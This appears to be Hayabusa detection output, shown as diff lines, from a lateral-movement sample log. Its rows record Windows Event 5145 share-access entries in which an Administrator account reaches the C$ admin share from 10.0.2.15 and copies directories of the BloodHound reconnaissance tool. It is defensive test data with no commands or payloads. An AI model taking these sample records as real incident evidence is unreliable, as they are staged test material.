+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 
